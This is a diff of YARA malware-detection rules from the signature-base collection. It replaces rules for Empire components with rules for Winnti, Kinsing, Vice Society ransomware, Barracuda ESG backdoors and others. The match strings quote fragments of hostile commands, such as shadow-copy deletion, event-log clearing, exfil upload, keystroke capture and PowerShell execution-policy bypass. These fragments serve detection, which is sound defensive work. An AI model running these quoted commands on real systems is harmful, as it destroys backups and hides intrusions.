+		$struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ??  }
 
 	condition:
-		( uint16( 0 ) == 0x233c and filesize < 40KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and $pdb and $struct and filesize < 20KB
 }
-rule SIGNATURE_BASE_Empire_Invoke_Egresscheck : FILE
+rule SIGNATURE_BASE_Seaduke_Sample : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-EgressCheck.ps1"
+		description = "SeaDuke Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21e09250-6853-5743-a6ef-aa6be8091d33"
-		date = "2016-11-05"
+		id = "011a303b-b051-519f-9687-668c9bcd15ca"
+		date = "2015-07-14"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L209-L222"
+		reference = "http://goo.gl/MJ0c2M"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_seaduke_unit42.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "693564e0bd98ebd03cd433d8ba1003051a5cf6b1f0c05d3c5a4682e6d667327e"
-		score = 75
+		hash = "d2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e"
+		logic_hash = "3bec2bedaafddd17ee65747f8be773287eda784bdfa8fc11e8378737139ef94e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
 
 	strings:
-		$s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
+		$s0 = "bpython27.dll" fullword ascii
+		$s1 = "email.header(" ascii
+		$s2 = "LogonUI.exe" fullword wide
+		$s3 = "Crypto.Cipher.AES(" ascii
+		$s4 = "mod is NULL - %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x233c and filesize < 10KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Reflectivepick_X64_Orig : FILE
+rule SIGNATURE_BASE_MAL_Winnti_BR_Report_Twinpeaks : FILE
 {
 	meta:
-		description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cd69a149-d881-5f93-9647-84241bd96ba5"
-		date = "2016-11-05"
-		modified = "2022-12-21"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L224-L240"
+		description = "Detects Winnti samples"
+		author = "@br_data repo"
+		id = "2e4e2b88-fdb4-5adc-8192-a304d71ca851"
+		date = "2019-07-24"
+		modified = "2023-12-05"
+		reference = "https://github.com/br-data/2019-winnti-analyse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_br.yar#L3-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a87c5f1da9c490887cba5e9837ca40ac92b63d8c36b682f4be770ac061b5acdf"
+		logic_hash = "76457f5aa4cc4bf4f43ffbaa60d63006455977e881f1d74b845835c505a93fed"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
 
 	strings:
-		$a1 = "\\PowerShellRunner.pdb" ascii
-		$a2 = "PowerShellRunner.dll" fullword wide
-		$s1 = "ReflectivePick" fullword ascii
+		$cooper = "Cooper"
+		$pattern = { e9 ea eb ec ed ee ef f0}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $a* ) and $s1
+		uint16( 0 ) == 0x5a4d and $cooper and ( $pattern in ( @cooper [ 1 ] .. @cooper [ 1 ] + 100 ) )
 }
-rule SIGNATURE_BASE_Empire_Out_Minidump : FILE
+
+rule SIGNATURE_BASE_MAL_BR_Report_Thedao : FILE
 {
 	meta:
-		description = "Detects Empire component - file Out-Minidump.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8c53d2ab-afc5-5d7b-97e1-496425b9664f"
-		date = "2016-11-05"
+		description = "Detects indicator in malicious UPX packed samples"
+		author = "@br_data repo"
+		id = "5cc932d7-2ec6-5570-af4a-3f64b39e6db5"
+		date = "2019-07-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L242-L256"
+		reference = "https://github.com/br-data/2019-winnti-analyse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_br.yar#L17-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ce4ac95ac942a2ad758b1d9034e6ec50d25d195ba1c2ae95a90a7490708e485"
+		logic_hash = "798b092b7667462aa66590603504cb0cd1166e4ac3472627cd8cd8fdf8f0b778"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
 
 	strings:
-		$s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii
-		$s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii
+		$b = { DA A0 }
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and $b at pe.overlay.offset and pe.overlay.size > 100
 }
-rule SIGNATURE_BASE_Empire_Invoke_Psexec : FILE
+rule SIGNATURE_BASE_MAL_Winnti_BR_Report_Mockingjay : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-PsExec.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "19aaec3e-3e8f-5d7d-9c70-a212756c0300"
-		date = "2016-11-05"
+		description = "Detects Winnti samples"
+		author = "@br_data repo"
+		id = "9aff9d65-3827-59de-9dc3-38f227155d3d"
+		date = "2019-07-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L258-L273"
+		reference = "https://github.com/br-data/2019-winnti-analyse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_br.yar#L30-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "86af63a3be5b4940966932b129edbe4cca5ac1a31d120ba44fdca739e9c97ad4"
+		logic_hash = "7a63b6f10cc5feebba16e585cb29d741876e1dc7f4dde3ef43ac76db9c7ad135"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
 
 	strings:
-		$s1 = "Invoke-PsExecCmd" fullword ascii
-		$s2 = "\"[*] Executing service .EXE" fullword ascii
-		$s3 = "$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\" ascii
+		$load_magic = { C7 44 ?? ?? FF D8 FF E0 }
+		$iter = { E9 EA EB EC ED EE EF F0 }
+		$jpeg = { FF D8 FF E0 00 00 00 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 50KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and $jpeg and ( $load_magic or $iter in ( @jpeg [ 1 ] .. @jpeg [ 1 ] + 200 ) ) and for any i in ( 1 .. #jpeg ) : ( uint8( @jpeg [ i ] + 11 ) != 0 )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Postexfil : FILE
+rule SIGNATURE_BASE_Crime_H2Miner_Kinsing : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-PostExfil.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "58d9e057-efde-56ab-9b7e-982342a910e2"
-		date = "2016-11-05"
+		description = "Rule to find Kinsing malware"
+		author = "Tony Lambert, Red Canary"
+		id = "1cabca0d-7134-517e-b82e-f2b20b4d1c34"
+		date = "2020-06-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L275-L289"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_h2miner_kinsing.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "74602d1c4986e6392df8845e0ed713499aa3b93c64e9d68e95f9dbaf60fe4299"
+		logic_hash = "8795f01f4ce85ca37a4e4667a4ee9756dae6af42884cf79830877a5c35a3bd3b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
 
 	strings:
-		$s1 = "# upload to a specified exfil URI" fullword ascii
-		$s2 = "Server path to exfil to." fullword ascii
+		$s1 = "-iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT"
+		$s2 = "libpcap"
+		$s3 = "main.backconnect"
+		$s4 = "main.masscan"
+		$s5 = "main.checkHealth"
+		$s6 = "main.redisBrute"
+		$s7 = "ActiveC2CUrl"
+		$s8 = "main.RC4"
+		$s9 = "main.runTask"
 
 	condition:
-		( uint16( 0 ) == 0x490a and filesize < 2KB and 1 of them ) or all of them
+		( uint32( 0 ) == 0x464C457F ) and filesize > 1MB and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Smbautobrute : FILE
+
+rule SIGNATURE_BASE_MAL_Ransomware_Wadhrama : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
+		description = "Detects Wadhrama Ransomware via Imphash"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a6b402ac-0925-5bc6-9d6a-b2b811496f9e"
-		date = "2016-11-05"
+		id = "f7de40e9-fe22-5f14-abc6-f6611a4382ac"
+		date = "2019-04-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L291-L305"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mal_ransom_wadharma.yar#L3-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd87a5d3a710017953c8c19862e4daee25de0e57175cab8246eea6d067fcb4d1"
+		logic_hash = "5d78837ed7cb8914be0990859751cf64603ee5a5ad135541c60c6ae145046412"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
-
-	strings:
-		$s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii
-		$s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii
+		hash1 = "557c68e38dce7ea10622763c10a1b9f853c236b3291cd4f9b32723e8714e5576"
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "f86dec4a80961955a89e7ed62046cc0e"
 }
-rule SIGNATURE_BASE_Empire_Get_Keystrokes : FILE
+rule SIGNATURE_BASE_MAL_ELF_Reverseshell_Sslshell_Jun23_1 : CVE_2023_2868 FILE
 {
 	meta:
-		description = "Detects Empire component - file Get-Keystrokes.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7fb57a0d-6b65-5ee8-96ef-9af303f15007"
-		date = "2016-11-05"
+		description = "Detects reverse shell named SSLShell used in Barracuda ESG exploitation (CVE-2023-2868)"
+		author = "Florian Roth"
+		id = "91b34eb7-61d2-592e-a444-249da43994ca"
+		date = "2023-06-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L307-L320"
+		reference = "https://www.barracuda.com/company/legal/esg-vulnerability"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_barracuda_cve_2023_2868.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "710e1bbf517c6683bd3082786e605cb8e6a52460f9c96609610e5ab38800dc79"
+		logic_hash = "57e9afb2f6928656242b8257cc3b98ae3b03e38c75ad40b544e3fc6afaea794d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
+		tags = "CVE-2023-2868, FILE"
+		hash1 = "8849a3273e0362c45b4928375d196714224ec22cb1d2df5d029bf57349860347"
 
 	strings:
-		$s1 = "$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii
+		$sc1 = { 00 2D 63 00 2F 62 69 6E 2F 73 68 00 }
+		$s1 = "SSLShell"
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+		uint32be( 0 ) == 0x7f454c46 and uint16( 0x10 ) == 0x0002 and filesize < 5MB and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Dllinjection : FILE
+rule SIGNATURE_BASE_MAL_ELF_SALTWATER_Jun23_1 : CVE_2023_2868 FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-DllInjection.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6aa14e8f-9801-5cd3-beb0-955e19d25503"
-		date = "2016-11-05"
+		description = "Detects SALTWATER malware used in Barracuda ESG exploitations (CVE-2023-2868)"
+		author = "Florian Roth"
+		id = "10a038f6-6096-5d3a-aaf5-db441685102b"
+		date = "2023-06-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L322-L335"
+		reference = "https://www.barracuda.com/company/legal/esg-vulnerability"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_barracuda_cve_2023_2868.yar#L21-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "450ca96dd7c80275d7e4eaf07a7229e27530c373b8d79af5be8f4a741daef448"
-		score = 75
+		logic_hash = "cb35898c0ee726170da93b4364920ac065f083f9f02db8eb5d293b1ce127cb78"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
+		tags = "CVE-2023-2868, FILE"
+		hash1 = "601f44cc102ae5a113c0b5fe5d18350db8a24d780c0ff289880cc45de28e2b80"
 
 	strings:
-		$s1 = "-Dll evil.dll" fullword ascii
+		$x1 = "libbindshell.so"
+		$s1 = "ShellChannel"
+		$s2 = "MyWriteAll"
+		$s3 = "CheckRemoteIp"
+		$s4 = "run_cmd"
+		$s5 = "DownloadByProxyChannel"
+		$s6 = "[-] error: popen failed"
+		$s7 = "/home/product/code/config/ssl_engine_cert.pem"
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 40KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x457f and filesize < 6000KB and ( ( 1 of ( $x* ) and 2 of them ) or 3 of them ) or all of them
 }
-rule SIGNATURE_BASE_Empire_Keepassconfig : FILE
+rule SIGNATURE_BASE_APT_MAL_RANSOM_Vicesociety_Polyvice_Jan23_1 : FILE
 {
 	meta:
-		description = "Detects Empire component - file KeePassConfig.ps1"
+		description = "Detects NTRU-ChaChaPoly (PolyVice) malware used by Vice Society"
 		author = "Florian Roth (Nextron Systems)"
-		id = "814a6ff9-a6ac-55e7-bb3f-597351ce421d"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L337-L350"
+		id = "e450407c-6c21-56bf-aedf-8e7f3890abe2"
+		date = "2023-01-12"
+		modified = "2023-01-13"
+		reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_vicesociety_dec22.yar#L2-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "044c8a326ee6cc74a918e6c28100032bfd2fb396ddab8683ab11e00f9370ab2a"
+		logic_hash = "3c7b76a693e5666515afee5c819b21e119ce5f1b0be675252673e6a24251ce8d"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
+		hash1 = "326a159fc2e7f29ca1a4c9a64d45b76a4a072bc39ba864c49d804229c5f6d796"
+		hash2 = "8c8cb887b081e0d92856fb68a7df0dabf0b26ed8f0a6c8ed22d785e596ce87f4"
+		hash3 = "9d9e949ecd72d7a7c4ae9deae4c035dcae826260ff3b6e8a156240e28d7dbfef"
 
 	strings:
-		$s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii
+		$x1 = "C:\\Users\\root\\Desktop\\niX\\CB\\libntru\\" ascii
+		$s1 = "C:\\Users\\root" ascii fullword
+		$s2 = "#DBG: target = %s" ascii fullword
+		$s3 = "# ./%s [-p <path>]/[-f <file> ] [-e <enc.extension>] [-m <requirements file name>]" ascii fullword
+		$s4 = "### ################# ###" ascii fullword
+		$op1 = { 89 ca 41 01 fa 89 ef 8b 6c 24 24 44 89 c9 09 d1 44 31 e6 89 c8 }
+		$op2 = { bd 02 00 00 00 29 cd 48 0f bf d1 8b 44 46 02 01 44 53 02 8d 54 0d 00 83 c1 02 48 0f bf c2 }
+		$op3 = { 48 29 c4 4c 8d 74 24 30 4c 89 f1 e8 46 3c 00 00 84 c0 41 89 c4 0f 85 2b 02 00 00 0f b7 45 f2 }
 
 	condition:
-		( uint16( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Sshcommand : FILE
+rule SIGNATURE_BASE_APT_MAL_RANSOM_Vicesociety_Chily_Jan23_1 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-SSHCommand.ps1"
+		description = "Detects Chily or SunnyDay malware used by Vice Society"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b06b507f-b6b8-5f4b-8d6d-920f141e9ac1"
-		date = "2016-11-05"
+		id = "1be4adb9-e60c-5023-9230-07f5fd16daaa"
+		date = "2023-01-12"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L352-L367"
+		reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_vicesociety_dec22.yar#L33-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3749c3d58335cb08bff66fe3126fc4977261576a9fbedbd7da673e3921364850"
-		score = 75
-		quality = 85
+		logic_hash = "fc2967d86bf73033e68b8b9409a197ae8f7fcdf06e1e2a17e3d277d243caa541"
+		score = 80
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
+		hash1 = "4dabb914b8a29506e1eced1d0467c34107767f10fdefa08c40112b2e6fc32e41"
 
 	strings:
-		$s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
-		$s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii
-		$s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii
+		$x1 = ".[Chily@Dr.Com]" ascii fullword
+		$s1 = "localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a>" ascii fullword
+		$s2 = "C:\\Users\\root\\Desktop" ascii fullword
+		$s3 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" wide fullword
+		$s4 = "cd %userprofile%\\documents\\" wide
+		$s5 = "noise.bmp" wide fullword
+		$s6 = " Execution time: %fms (1sec=1000ms)" ascii fullword
+		$s7 = "/c vssadmin.exe Delete Shadows /All /Quiet" wide fullword
+		$op1 = { 4c 89 c5 89 ce 89 0d f5 41 02 00 4c 89 cf 44 8d 04 49 0f af f2 89 15 e9 41 02 00 44 89 c0 }
+		$op2 = { 48 8b 03 48 89 d9 ff 50 10 84 c0 0f 94 c0 01 c0 48 83 c4 20 5b }
+		$op3 = { 31 c0 47 8d 2c 00 45 85 f6 4d 63 ed 0f 8e ec 00 00 00 0f 1f 80 00 00 00 00 0f b7 94 44 40 0c 00 00 83 c1 01 }
 
 	condition:
-		( uint16( 0 ) == 0x660a and filesize < 2000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen1 : FILE
+rule SIGNATURE_BASE_Trojandownloader : FILE
 {
 	meta:
-		description = "Detects Empire component"
+		description = "Trojan Downloader - Flash Exploit Feb15"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8fdb48a0-5d40-55be-ae23-e9c8c4c2ecea"
-		date = "2016-11-05"
+		id = "d61f59ef-31a3-5e52-9525-61910bb150db"
+		date = "2015-02-11"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L371-L390"
+		reference = "http://goo.gl/wJ8V1I"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_generic.yar#L4-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "074423d30c5ef419d1ca9433477d8a896086cec84eb939270ce51d3965b6b1a2"
-		score = 75
-		quality = 85
+		hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
+		logic_hash = "4911098beea1d348d41d6a38c03b343bb7b8a8090ba664fd4b0747045127c686"
+		score = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
-		hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
-		hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
-		$s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii
+		$x1 = "Hello World!" fullword ascii
+		$x2 = "CONIN$" fullword ascii
+		$s6 = "GetCommandLineA" fullword ascii
+		$s7 = "ExitProcess" fullword ascii
+		$s8 = "CreateFileA" fullword ascii
+		$s5 = "SetConsoleMode" fullword ascii
+		$s9 = "TerminateProcess" fullword ascii
+		$s10 = "GetCurrentProcess" fullword ascii
+		$s11 = "UnhandledExceptionFilter" fullword ascii
+		$s3 = "user32.dll" fullword ascii
+		$s16 = "GetEnvironmentStrings" fullword ascii
+		$s2 = "GetLastActivePopup" fullword ascii
+		$s17 = "GetFileType" fullword ascii
+		$s19 = "HeapCreate" fullword ascii
+		$s20 = "VirtualFree" fullword ascii
+		$s21 = "WriteFile" fullword ascii
+		$s22 = "GetOEMCP" fullword ascii
+		$s23 = "VirtualAlloc" fullword ascii
+		$s24 = "GetProcAddress" fullword ascii
+		$s26 = "FlushFileBuffers" fullword ascii
+		$s27 = "SetStdHandle" fullword ascii
+		$s28 = "KERNEL32.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		$x1 and $x2 and ( all of ( $s* ) ) and filesize < 35000
 }
-rule SIGNATURE_BASE_Empire_Powerup_Gen : FILE
+rule SIGNATURE_BASE_Ismdoor_Jul17_A2 : FILE
 {
 	meta:
-		description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
+		description = "Detects IsmDoor Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae6b0462-7193-54a4-8fb9-befc1b461b15"
-		date = "2016-11-05"
+		id = "ea72a496-cbc8-56f6-a852-7af9761ea58e"
+		date = "2017-08-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L392-L407"
+		reference = "https://twitter.com/Voulnet/status/892104753295110145"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_generic.yar#L54-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4086b057b46cac85bb871d2d4363d4ae4c99a160e5c9625e4d41e3df55fece2d"
+		logic_hash = "7944f690be190927c905d3b3c6e26765504af9fcfb445cf70c8899af115d5001"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
+		hash1 = "be72c89efef5e59c4f815d2fce0da5a6fac8c90b86ee0e424868d4ae5e550a59"
+		hash2 = "ea1be14eb474c9f70e498c764aaafc8b34173c80cac9a8b89156e9390bd87ba8"
 
 	strings:
-		$s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii
-		$s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii
+		$s1 = "powershell -exec bypass -file \"" fullword ascii
+		$s2 = "PAQlFcaWUaFkVICEx2CkNCUUpGcA" ascii
+		$s3 = "\\Documents" ascii
